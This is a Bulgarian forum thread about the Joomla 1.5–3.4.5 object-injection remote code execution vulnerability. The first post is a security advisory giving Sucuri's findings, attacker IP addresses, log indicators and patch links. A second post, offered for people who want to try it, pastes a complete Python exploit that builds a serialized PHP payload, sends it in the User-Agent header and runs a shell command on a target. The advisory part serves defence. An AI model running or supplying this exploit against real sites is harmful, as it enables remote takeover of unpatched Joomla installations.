ВНИМАНИЕ! Секюрити ъпдейт за Joomla от 1.5 до 3.4.5

sunstorm

Active Member
Открита е и поправена уязвимост във всички версии на Joomla от 1.5.0 до 3.4.5. Ако не сте ъпдейтвали до 3.4.6 - побързайте, дупката е сериозна!

Уязвимостта е оправена в новата версия на системата - 3.4.6 - и засяга версиите на Joomla от 1.5.0 до 3.4.5. Сериозността на проблема е толкова голям, че е доставен пач за версии, които вече не се поддържат.

„Това, което е особено притеснително е, че тази уязвимост вече е била експлоатирана преди няколко дни”, обяснява Дениъл Сид от Succuri. „Разглеждайки записите ни, ние видяхме, че тя е експлоатирана на 12.12.2015г. като това е последвано от стотици подобни опити след това на 13-ти и 14-ти декември”. Първите атаки са проведени от три IP адреса: 146.0.72.83, 74.3.170.33 и 194.28.174.106. От Succuri съветват да прегледате логовете от мрежовата активност към системите ви и да видите, дали някой от тези адреси не се е опитвал да достъпва вашите ресурси. Специалистите съобщават, че вероятно всеки един сайт, изграден на основата на Joomla е в риск и колкото по-бързо наложите обновлението, толкова по-добре.

„Препоръчвам също така да претърсите лог записите си за JDatabaseDriverMysqli или „О:” в потребителския агент, тъй като е използван в атаките. Откриете ли ги, считайте инсталацията си за компрометирана и започнете да налагате плана си, подготвен за подобни случаи”, съветва Сид.

Информация от официалния сайт на Joomla: https://developer.joomla.org/securi...core-remote-code-execution-vulnerability.html

За Joomla 1.5 и 2.5

Можете да изтеглите от тук пачове: https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions.
Ще трябва ръчно да поставите файловете на сървъра. Не е автоматичен ъпдейт,

Ако някой среща трудности да пише в темата и ще помогна с каквото мога.
 
Последно редактирано:
От: ВНИМАНИЕ! Секюрити ъпдейт за Joomla от 1.5 до 3.4.5

Нека дадем детайли, има и любопитни и такива който желаят да пробват.

Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution

import requests # easy_install requests

def get_url(url, user_agent):

headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response

def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))

return encoded[:-1]


def generate_payload(php_payload):

php_payload = "eval({0})".format(php_str_noquotes(php_payload))

terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate

return exploit_template



pl = generate_payload("system('touch /tmp/fx');")

print get_url("http://172.31.6.242/", pl)
 

Горе